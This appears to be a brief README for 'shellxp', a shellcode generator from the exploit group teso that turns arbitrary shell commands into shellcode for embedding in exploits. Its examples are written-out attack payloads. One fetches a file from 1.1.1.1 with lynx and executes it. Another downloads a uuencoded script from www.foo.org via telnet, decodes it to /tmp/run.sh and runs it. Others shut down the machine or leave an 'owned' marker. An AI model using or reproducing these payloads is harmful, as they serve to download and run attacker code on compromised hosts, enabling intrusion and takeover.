
gcc -o shellxp shellxp.c

./shellxp commands ...

or to exec the generated shellcode

./shellxp exec commands ...


either rip the sc_build routine into your exploits to directly create the
shellcode on the fly, or prepare it.

some examples:

./shellxp /bin/sh -c "lynx -source 1.1.1.1/a>a;chmod +x a;./a"
./shellxp /bin/sh -c "echo haha > /tmp/owned"
./shellxp /sbin/shutdown -h now

or especially fancy ;-)

./shellxp /bin/sh -c "((echo GET /test/ HTTP/1.0;echo;sleep 5)|telnet www.foo.org 80)|uudecode;/tmp/run.sh"

   (where /test/index.html is a uuencoded file that will uudecode to an executable /tmp/run.sh file)
   modify the "sleep 5" to an appropriate value to allow the file to get retrieved :-)

(imagine some other fancy stuff in here :-)
...

-scut/teso.


to modify the shellcode, use:

gcc -o shellcode shellcode.c sc.s
./shellcode      <-- will dump the code
./shellcode foo  <-- will dump and run the code